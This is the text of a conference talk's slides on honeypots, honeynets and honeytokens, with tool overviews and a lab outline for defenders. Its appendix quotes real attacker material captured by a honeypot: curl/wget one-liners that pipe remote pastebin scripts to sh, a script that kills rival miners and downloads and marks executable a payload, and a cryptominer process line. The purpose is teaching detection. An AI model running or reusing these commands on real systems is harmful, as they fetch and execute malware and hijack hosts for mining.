Honeypots & Honeynet

APNIC48 Adli Wahid

adli@apnic.net

Reminder

• Some of the URL/Links/Scripts shown are malicious • Handle with care

2

The Cuckoo’s Egg – Clifford Stoll • Book published in 1989 based on events that took place a few years

before that • 1986 – over 10 months of investigations • $0.75 accounting error

• First person account of the hunt for a computer hacker who broke into the Lawrence Berkeley National Lab (LBNL)

• Story about o Unauthorised Accesso Vulnerability exploitation o Lateral Movement o Exfiltration o Detection / Monitoring o Deceptiono Collaboration o History of the Internet

• TL;DR o https://youtu.be/1h7rLHNXio8 (talk by Clifford Stoll) o https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg

3

Perspective – Adversary Tactics and Techniques • Mitre Att&ck Framework• Tactics – what are the goals of the adversary?• Technique – how do they do it? • Subject to:

o Resourceso Platforms

• Can we used this knowledge for detection?o Observe Adversaries Behaviouro Techniques, Tactics and Procedures (TTPs)o Deploy in prevention, detection, response

https://attack.mitre.org

4

Your Adversaries

Your Assets Your Systems

MotivesTargets

InfrastructureBehaviour

Reference: https://published-prd.lanyonevents.com/published/rsaus19/sessionsFiles/13884/AIR-T07-ATT%26CK-in-Practice-A-Primer-to-Improve-Your-Cyber-Defense-FINAL.pdf 5

Reference: https://published-prd.lanyonevents.com/published/rsaus19/sessionsFiles/13884/AIR-T07-ATT%26CK-in-Practice-A-Primer-to-Improve-Your-Cyber-Defense-FINAL.pdf 6

Real Linux Server Compromise

7

www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )

8

Questions

• How did the attacker discover the host & vulnerabilities?• How did the attacker gain initial foothold?

oWhat was the vulnerability exploited? oWhat tools did they use?

• How did the attacker maintain persistence?• What was the actual payload?

oWere there any artefacts?• What are the indicators of compromise?

oCan we map the adversaries infrastructure • Can we do something about this?

9

Learning from compromised systems

• Can be a bit tricky or complicated • Production

oReal data / services o In principle should be hardened

• What ifoWe can emulate real systems o ‘Attract’ adversaries oObserve and collect information oControlled environment

10

Honeypots

• Know your enemy oHow can we defend against an enemy, when we don’t even know who the

enemy is? (Lance Spitzner, 1999 – The Honeynet Project)

• Purpose o To learn the tools, tactics and motives involved in computer and network

attacks, and share the lessons learned - (Mission Statement, The Honeynet Project)

o Today : TTPs – Tactics, Techniques and Procedures

11

Honeypots and Honeynet

• A honeypot is an information system resource whose value lies in the unauthorized or illicit use of that resource

• Honeypot systems have no production value, so any activity going to or from a honeypot is likely a probe, attack or compromise

• A honeynet is simply a network of honeypots • Information gathering and early warning are the primary benefits to

most organisations

12

Honeypot and Honeynet Types

• Low-Interaction (LI) • Emulates services, applications and OS’s• Easier to deploy/maintain, low risk, but only limited information

• High-Interaction (HI) • Real services, applications and OS’s • Capture extensive information, but higher risk and time intensive to maintain

13

Honeypot and Honeynet Types

• Server Honeypots • Listen for incoming network connections • Analyse attacks targeting host’s users, services and operating systems

• Client Honeypots • Reach out and interact with remote potentially malicious resources • Have to be instructed where to go to find evil • Analyse attacks targeting clients and users

14

Honeypot and Honeynet Pros / ConsPros

• Simple• Collect small data sets of

high value • Few False Positives • Catch new attacks • Low False Negatives • Can beat encryption • Minimal hardware • Real time detection /

alerting

Cons

• Potentially complex • Need data analysis • Detection by attackers• Risk from compromises • Legal concerns • False negatives• Potentially live 24/7 • Operationally intensive

15

Deploying Honeypots

16

Recap

Honeypots: Computer resource(s) to be probed and/or attacked

17

Evilness

Malware

Badness

Noise

Why would you want to do this? • Threat Modeling

o What are you trying to detect o What are your concerns?

• By right, you should not expect any real activity or traffic to/from/in your honeypot

• Detect anomalous activities in your network or system? • Infected / Compromised computers • Misconfiguration

• Learn about attacks in the wild (research) • Especially if you can scale the deployment• Attackers and attacker techniques • Information Sharing opportunities • Improve overall Security

18

Generic ‘Network-based Attack’ Pattern

19

Honeypot (Target)

Host1 Host 2

1

2

(Or) 21. Connection

initiated to Honeypot

2. Connect Back / Call-Home

What can you learn?

• Hosts that are trying to connect / scan you • Potentially already compromised or infected • Such as IP address • Targets that adversaries are going after

• Techniques o Lateral movement o Hiding in plain sight

• Scripts, binaries, executables and other artifacts • Droppers / Payloadds• Remote control scripts• Malware samples

20

Example of Client-based Honeypot

21

Honeypot

(Client-Side) Target

1. Honeypot initiate connection

2. Analyse response

Controlled Environment

• It is critical to ensure that honeypot is not: o Abused i.e. attack another host

• Capture activities and artifacts for analysis • Sandbox

o Services emulation that provides interaction o OS hardened and configured to capture activities

• Additional controls o Firewall / ACLs o Intrusion Detection Systems / Network Security Monitoring

• Must be balanced to make the system ‘realistic’

22

What you can learn?

• Learn about hosts / computers that are hosting malicious contents. oDrive-by downloads

• Checking for malicious codes within: o <Iframes> o Javascripto Flasho JAVA appletoPDFoOther web content

23

24

Artifacts

• 2010:09:14:07:13:10 < honeypot> 2010-09-14 07:19:27 GMT 184.y.z.144 a05dfd7cca7771a7565a154d65f05ea2http://domain.lv/inx/fx29id1.txt????

• 2010:09:14:07:13:11 < honeypot> 2010-09-14 07:19:30 GMT 184.y.z.144 8dcad47f3e32e7dc1aee59167e67c601http://domain.lv/inx/fx29id2.txt?????

25

Demo

26

Honeytokens

• A honeytoken is data or a computing resource that exists for the purpose of alerting you when someone accesses it

• Deception -> Detection• How do I know if there’s an adversary in my network already?

27

Scenario

• Adversary _already_ inside your infrastructure or valueable target

• Detection on hosts & strategic locations

• Multiple Forms: o Usernames / Passwords o URL / Links o Files o Web Pages o Etc

• Adversary use / open tokens and announce their presence

28

Use-Case Fileserver

29

30

Scan to get Server Information

https://www.canarytokens.org

31

Implementation

• CanarytokensoCanarytokens.org by Thinks oOpensource Source (on Github) ohttps://github.com/thinkst/canarytokens

• Dcept by SecureworksoOpensourceoActiveDirectoryohttps://github.com/secureworks/dcept

oCommercial Solutions are available

32

Tools for Deploying Honeypots

33

High Interaction Honeypot

• Think about your goals and objectives first

• Possible scenario• Setup a real system and make give it an IP address (so it is reachable to

something) • i.e. Install a Windows, Linux, Unix server

• Challenging to control & manage• What if attacker use system to launch attack to other systems • Keeping the computer in a usable state

34

Some Examples

• Dionaea (Malware) ：http://dionaea.carnivore.it/

• Cowrie : https://github.com/cowrie

• Kippo - SSH honeypot ：https://code.google.com/p/kippo/

• Glastopf – Web Honeypot : http://glastopf.org/

• Ghost – USB Honeypot • https://code.google.com/p/ghost-usb-honeypot/

• Thug – Client Honeypot • https://github.com/buffer/thug

35

Dionaea

• 2nd Generation low interaction honeypot• Python, runs on *NIX• IPv6 Support

• Goals• Detect both known and unknown attacks • Better protocol awareness• Vulnerability modules in scripting language • Shell code detection using LibEmu

• Check out http://dionaea.carnivore.it• Learn about attacks, malware and many more

36

Cowrie

• Emulate SSH server / Telnet Server • Allow ‘attacker’ to log-in using credentials (username and password) • Environment allow limited commands – i.e. ping, who, and wget• Record activities (keylog) of attackers and their activities

37

Glastopf Web Honeypot

• Minimalistic web server written in Python • Scans incoming HTTP requests strings • Checks for remote file inclusion (RFI), local file inclusion (LFI) and SQL

injection • Signatures and dynamic attack detection • Attempt to download attack payloads • Search keyword indexing to draw attackers• MySQL DB plus web console• Integration with botnet monitoring & sandbox • Check out Glastopf.org

38

Ghost

• USB Honeypot • Runs on Windows• Many malware spread across systems using thumbrive (and bypass

network containment strategies) • i.e. Stuxnet, Conficker

• Trick malware into thinking that a USB Thumbrive has been inserted• Captures malware written on USB • More: https://code.google.com/p/ghost-usb-honeypot

39

Thug

• Low Interaction Client-based honeypot to emulate web browser • Browser Personalities (i.e. IE)• Discovering Exploit Kits, Malicious Websites

• Python vulnerability modules: activeX controls, core browser functions, browser plugins

• Logging: flat file, MITRE MAEC format, mongoDB, HPFeeds events + files • Testing: successfully identifies, emulates and logs IE WinXP infections and

downloads served PDFs, jars, etc from Blackhole & other attack kits• More information

• http://www.honeynet.org/node/827

40

Tools and Projects

• Cuckoo Sandbox • Visualization • The Honeynet Project

• HPFeed

41

Cuckoo Sandbox

• Automated Malware Analysis System • Why not just use Anti-Virus?

• Analyze Windows executables, DLL files, PDF documetns, Office documents, PHP Scripts, Python Scripts and Internet URLs

• Windows guest VMs in Virtual Box Linux • Windows hooking / driver plus python modules for extracting and

analysing sample executions

42

Cuckoo Sandbox (2)

• Trace of relevant win32 API calls performed • Dump network traffic generated (pcap) • Creation of screenshots taken during analysis • Dump of files created, deleted and downloaded by the malware

during analysis • Extract trace of assembly instructions executed by malware process • http://www.cuckoosandbox.org/• http://www.malwr.com

43

Visualization

• Many of the tools do not really have a GUI • Reporting / Presentation is key • Essentially centralise and visualize logs

o Splunk o ElasticStack

44

APNIC Community Honeynet Project • Context

• Part of network security training – using honeypots for visualizing network security attacks / threats

• Lots of interests to deploy and ‘learn more’ after the training • Opportunity to learn, share data and more!

• Collaboration • Partners deploy honeypots, APNIC runs the backend • Information collected among partners • Explore opportunities to learn more & connect with HP

communities• Outcomes

• 15-ish honeypots in AP region (more to come) since 2017 • Shout-outs: GEMNET (MN), TCC (Tonga), MoH (WS), MYREN (MY)• DASH, collaboration with our Product Team

45

APNIC Community HP

Backend

Honeypot 1

Honeypot 2

Honeypot 3

APNIC

AP Community

Sharing Portal

The Honeynet Project

• Started in 2000 • Know Your Enemy white paper http://old.honeynet.org/papers/enemy/

• The platform for those interested in running, building and learning from honeypots

• http://www.honeynet.org

• Many Chapters from around the world • Annual Conference • Tools • GSOC

47

Consider!

• Installing and playing with Honeypots to learn about security

• Deploying it internally to catch malicious activities

• Joining the Honeynet Project

• Sharing your experience and knowledge

• Happy Honeypotting!

48

49

Lab Session

1. Setting up telnet/ssh honeypot (Cowrie)

50

X

honeypot sensor(You are here)

Mothership (logging & processing) Elkstack / Kibana

Appendix

51

https://blog.apnic.net/2019/08/21/a-tale-of-two-honeypots-in-bhutan/

52

BtCIRTpot

Interesting Link: http://185.x.y.z/ssh1.txt

Compromise over Telnet and SSH

Username and PasswordsAttempts

Source Countries

53

Content - one-liners

(curl -fsSL hxxps://pastebin.com/raw/xmxHzu5P||wget -q -O-hxxps://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh

(curl -fsSL hxxps://pastebin.com/raw/CBEphEbb||wget -q -O-hxxps://pastebin.com/raw/CBEphEbb)|sed 's/\r//’|sh

(curl -fsSL hxxps://pastebin.com/raw/Zk7Jv9j2||wget -q -O-hxxps://pastebin.com/raw/Zk7Jv9j2)|sed -e 's/\r//g'|sh

54

What Is the content of the URL (on pastebin) - #1ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9

ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9apt-get install curl -y||yum install curl -y||apk add curl -yapt-get install cron -y||yum install crontabs -y||apk add cron -ysystemctl start crondsystemctl start cronsystemctl start crontabservice start crondservice start cronservice start crontab

55

[Snip]if [ ! -f "/tmp/.X11unix" ]; then

ARCH=$(uname -m)if [ ${ARCH}x = "x86_64x" ]; then

(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSLhxxp://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget--timeout=30 --tries=3 -q hxxp://sowcar.com/t6/696/1554470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSLhxxps://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q hxxps://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods

[snip]

56

Digging in Further – what can we learn about the indicators (filename, URL, IP address)

Filename: 1554470365x2890174166.jpg

SHA256 = 74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8

https://www.hybrid-analysis.com/sample/74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c857

58

The Big Picture

Attacking Host

[IP Address]

HoneypotPastebin

1. Attacking host bruteforce and gain access 2. Download malicious script 3. Execute malicious script

o Honeypot won’t execute the script but we have a copy of the malware sample

o What is the malware doing? 59

Attacking IP – what do we know about it?

• DShield IP Reputation Summary

IP: x.y.z.44 Reputation: Suspicious Network: x.y.z.0/19 AS: 17660 AS Name: DRUKNET-AS DrukNet ISP, AS Country: BT AS Abuse Contact: systems@bt.bt[SNIP]Threat Feeds: 4

Source: DSHIELD

61